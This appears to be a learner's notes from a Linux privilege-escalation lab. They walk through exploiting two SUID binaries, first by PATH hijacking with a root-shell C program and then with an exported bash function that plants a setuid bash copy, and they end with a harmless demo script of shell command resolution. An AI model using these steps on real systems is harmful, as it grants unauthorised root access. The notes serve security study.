How to find the variables:
env
Shows things like PATH, SSH_CONNECTION, PWD, OLDPWD.
Can we change PATH to get privilege escalation?
Find SUID binaries (files with the setuid bit set, -perm -04000) and list them:
find / -type f -perm -04000 -ls 2>/dev/null
What's significant about the suid-env program?
/usr/local/bin/suid-env
Can we run strings on it?
strings /usr/local/bin/suid-env
Mostly not making sense, but at the end it's starting apache2: it calls "service apache2 start" with a bare command name, so the shell has to look "service" up in PATH. What is PATH?
echo $PATH
These directories are searched, in order, for any command name that contains no slash.
The Attack:
What if we change where service is found? If we create a malicious program called service and put its directory at the front of PATH, the SUID binary will run ours (as root) instead of the real one.
How:
Write a tiny C program that sets uid/gid to root and spawns a shell (the includes are needed for setuid/setgid/system to compile cleanly; setuid(0) only succeeds because the SUID binary hands us an effective uid of 0):
printf '%s\n' '#include <stdlib.h>' '#include <unistd.h>' 'int main(void) { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/service.c
Double check:
cat /tmp/service.c
Compile service.c:
gcc /tmp/service.c -o /tmp/service
Now change PATH so our malicious binary is found first:
export PATH=/tmp:$PATH
Check that PATH was changed:
echo $PATH
/tmp was added and comes first in the list. This means the shell finds service in /tmp before checking the legitimate service in the other PATH directories.
Now run the SUID binary that starts apache; it runs our service instead and gives us root:
/usr/local/bin/suid-env
whoami
What about:
/usr/local/bin/suid-env2
Run strings on it:
strings /usr/local/bin/suid-env2
/usr/sbin/service apache2 start
This time service is called by absolute path, so PATH is never consulted. Can we overwrite it?
Create a file:
printf '%s\n' '#include <stdlib.h>' '#include <unistd.h>' 'int main(void) { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/service.c
Compile it into the folder specified:
gcc /tmp/service.c -o /usr/sbin/service
Permission denied: /usr/sbin is writable only by root. Not sure.
How he did it:
Create a malicious bash function whose name is the full path the binary calls:
function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
The function copies bash, sets the setuid/setgid bits on the copy, and runs it with -p so bash keeps the effective uid 0 instead of dropping it.
Export the function:
export -f /usr/sbin/service
-f means export a shell function (the one we defined above) through the environment, so child shells see it.
Run it:
/usr/local/bin/suid-env2
Root again! This works because the SUID binary runs the command via system(), i.e. through /bin/sh; on this box that is bash, and an old bash imports the exported function from the environment and calls it in place of /usr/sbin/service. Bash builds with the post-Shellshock fixes (late 2014 onward) refuse to import functions whose names are not valid identifiers, so this trick depends on an old bash being /bin/sh.
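Added example, not from the notes or the room: a small POSIX sh script that reproduces the command resolution behind both suid-env and suid-env2 without any SUID binary or root. It builds a fake "service" (constructed, it only echoes) in a temp directory, then shows that a bare name like service is found by walking PATH left to right (so a prepended directory wins), while an absolute path like /usr/sbin/service never touches PATH. The function names make_fake_bin, resolve_cmd and demo are my own.

```shell
#!/bin/sh
# Added example (not from the notes): how /bin/sh resolves a command name.
# Runs unprivileged; the fake "service" below is constructed and harmless.

# Create a scratch directory holding a fake "service" and print its path.
make_fake_bin() {
    dir=$(mktemp -d) || return 1
    cat > "$dir/service" <<'EOF'
#!/bin/sh
echo "HIJACKED: fake service ran as uid $(id -u) with args: $*"
EOF
    chmod +x "$dir/service"
    printf '%s\n' "$dir"
}

# Resolve a command the way the shell does for a simple command:
#   - a name containing "/" is taken literally (PATH is never consulted);
#   - otherwise walk PATH in order and return the first executable match.
# Prints the resolved path; returns 1 if nothing is found.
resolve_cmd() {
    name=$1
    searchpath=$2
    case $name in
        */*) printf '%s\n' "$name"; return 0 ;;
    esac
    oldifs=$IFS
    IFS=:
    for d in $searchpath; do
        if [ -f "$d/$name" ] && [ -x "$d/$name" ]; then
            IFS=$oldifs
            printf '%s\n' "$d/$name"
            return 0
        fi
    done
    IFS=$oldifs
    return 1
}

# Walk through the two scenarios from the notes: bare "service" (suid-env)
# with and without a hijack directory in front, and absolute
# /usr/sbin/service (suid-env2), which PATH cannot redirect.
demo() {
    fake=$(make_fake_bin) || return 1
    sys_path=/usr/sbin:/usr/bin:/sbin:/bin
    hijacked=$fake:$sys_path

    echo "bare service, normal PATH    -> $(resolve_cmd service "$sys_path" || echo '(none)')"
    echo "bare service, hijacked PATH  -> $(resolve_cmd service "$hijacked")"
    echo "absolute /usr/sbin/service   -> $(resolve_cmd /usr/sbin/service "$hijacked")"

    # Run it the way system("service apache2 start") would inside /bin/sh:
    # bare name, PATH decides, and the fake's directory comes first.
    ( PATH=$hijacked; export PATH; service apache2 start )
    rm -rf "$fake"
}
demo
```

The hijacked run prints the HIJACKED line even if a real /usr/sbin/service exists, which is exactly why suid-env is exploitable and suid-env2 needs the exported-function trick instead.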
